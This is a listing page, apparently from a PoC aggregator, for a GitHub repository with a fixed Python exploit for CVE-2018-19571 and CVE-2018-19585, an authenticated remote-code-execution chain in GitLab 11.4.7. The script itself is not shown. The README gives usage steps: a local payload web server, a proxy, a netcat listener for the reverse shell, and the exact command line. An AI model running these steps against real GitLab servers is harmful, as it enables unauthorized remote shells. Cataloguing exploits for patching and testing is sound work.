CVE-2018-19571 PoC — GitLab 代码问题漏洞

Source

https://github.com/xenophil90/edb-49263-fixed

Associated Vulnerability

Title:GitLab 代码问题漏洞 (CVE-2018-19571)
Description:GitLab CE/EE, versions 8.18 up to 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, are vulnerable to an SSRF vulnerability in webhooks.

Description

Fixed version of the Python script to exploit CVE-2018-19571 and CVE-2018-19585 (GitLab 11.4.7 - Authenticated Remote Code Execution) that is available at https://www.exploit-db.com/exploits/49263 (Python 3.9).

Readme

# edb-49263-fixed - GitLab 11.4.7 - Authenticated Remote Code Execution
Fixed version of the Python script to exploit CVE-2018-19571 and CVE-2018-19585 (GitLab 11.4.7 - Authenticated Remote Code Execution) that is available at https://www.exploit-db.com/exploits/49263 (Python 3.9).

## Usage
Edit the script and replace the target address there with the actual target address.

Also keep in mind that you have to

1. have a valid user account on the target Gitlab instance,
2. run a (python) web server on port 80 in the directory that the script is run from,
3. have an active proxy server on your machine on port 8080 (e. g. BURP with intercept turned off; script execution will fail without error if there is no proxy server running on the local host or if it is refusing connections), and
4. have a netcat listener set up on the desired port on your machine.

The script is then executed as follows:

`python3 49263.py -U username -P password -l local-ip -p local-port-for-netcat-listener`

File Snapshot


 [4.0K]  /data/pocs/c6ed3cea9a4da262a0e3c89945a9503beaf3a87c
├── [8.5K]  49263.py
└── [ 995]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!